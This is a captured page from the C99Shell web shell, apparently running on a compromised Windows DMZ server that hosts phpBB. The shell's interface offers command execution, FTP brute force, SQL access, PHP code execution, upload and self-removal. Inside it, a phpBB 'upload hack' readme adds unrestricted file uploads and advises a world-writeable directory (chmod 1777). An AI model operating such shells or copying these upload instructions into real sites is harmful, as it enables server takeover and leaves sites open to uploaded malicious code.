!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     readme.txt (6.35 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
I setup the hack so that only registered users would see the upload entry on the forms used to post. 

Also note, the hack requires that a directory be world writeable, preferably as a subdirectory of your phpBB directory. 


INSTALLATION: 

1. Upload these two php files: 
process_upload.php 
upload_dir.php 

Drop the .txt extension when putting these in your main phpBB directory. 

2. Edit config.php and include the following somewhere before the "?>": 
Code:
--------------------------------------------------------------------------------
 
// upload hack
$url_uploads = "./uploads"; // relative to $url_phpbb!
$max_upload_size = "800000"; // in bytes
$allow_uploads = 1; // allow uploads, easy on/off

 

--------------------------------------------------------------------------------
 


3. Edit reply.php: 
Find all instances of: (more than one!) 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST">

 

--------------------------------------------------------------------------------
 

Replace with: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST" ENCTYPE="multipart/form-data">

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
		   // If it's been edited more than once, there might be old "edited by" strings with
		   // escaped HTML code in them. We want to fix this up right here:
		   $message = preg_replace("#<font size=-1>[ $edit_by(.*?) ]</font>#si", '<font size=-1>[ ' . $edit_by . ' ]</font>', $message);	
      }
   }

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
   // upload hack
   if($allow_uploads == 1)
      include('process_upload.'.$phpEx);

 

--------------------------------------------------------------------------------
 

Find: 
Code:
--------------------------------------------------------------------------------
 
		<TD  BGCOLOR="<?php echo $color1?>" width=25%><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>"><b><?php echo $l_options?>:</b></TD>
		<TD  BGCOLOR="<?php echo $color2?>" ><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>">

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
<?php
// upload hack
 if($user_logged_in && $allow_uploads == 1) {
?>
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="$max_upload_size">
Upload File: <INPUT TYPE="FILE" NAME="file1" SIZE="30">
<?php
echo "<BR><SMALL>Upload limit (bytes): $max_upload_size</SMALL><BR><BR>";
 } // end file upload
?>

 

--------------------------------------------------------------------------------
 


4. Edit newtopic.php: 

Find: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST">

 

--------------------------------------------------------------------------------
 

Replace with: 
Code:
--------------------------------------------------------------------------------
 
<FORM ACTION="<?php echo $PHP_SELF?>" METHOD="POST" ENCTYPE="multipart/form-data">

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
   if($allow_html == 0 || isset($html))
   {
     $message = htmlspecialchars($message);
     $is_html_disabled = true;
   }

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
   // upload hack
   if($allow_uploads == 1)
      include('process_upload.'.$phpEx);

 

--------------------------------------------------------------------------------
 


Find: 
Code:
--------------------------------------------------------------------------------
 
<TD  BGCOLOR="<?php echo $color1?>" width=25%><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>"><b><?php echo $l_options?>:</b></TD>
		<TD  BGCOLOR="<?php echo $color2?>" ><font size="<?php echo $FontSize2?>" face="<?php echo $FontFace?>">

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
<?php
// upload hack
 if($user_logged_in && $allow_uploads == 1) {
?>
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="$max_upload_size">
Upload File: <INPUT TYPE="FILE" NAME="file1" SIZE="30">
<?php
echo "<BR><SMALL>Upload limit (bytes): $max_upload_size</SMALL><BR><BR>";
 } //allow file upload
?>

 

--------------------------------------------------------------------------------
 


5. Edit viewtopic.php to allow moderators to easily delete uploaded files: 
Find: 
Code:
--------------------------------------------------------------------------------
 
echo "<a href="$url_phpbb/topicadmin.$phpEx?mode=move&topic=$topic&forum=$forum"><IMG SRC="$movetopic_image" ALT="$l_movetopic" BORDER=0></a> ";
echo "<a href="$url_phpbb/topicadmin.$phpEx?mode=del&topic=$topic&forum=$forum"><IMG SRC="$deltopic_image" ALT="$l_deletetopic" BORDER=0></a></CENTER>n";

 

--------------------------------------------------------------------------------
 

Below add: 
Code:
--------------------------------------------------------------------------------
 
echo "<CENTER><FONT FACE=\"$FontFace\" SIZE=\"$FontSize1\" COLOR=\"$textcolor\">"; 
echo "<a href=\"$url_phpbb/upload_dir.$phpEx\">[Edit uploads]</a>"; 
echo "</FONT></CENTER>"; 
 

--------------------------------------------------------------------------------
 



I think that's about it. The trick to getting it to work is to make sure your directory is set correctly and writeable to world (chmod 1777 should work), and to make sure you add the ENCTYPE="multipart/form-data" to all the FORM tags. 


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--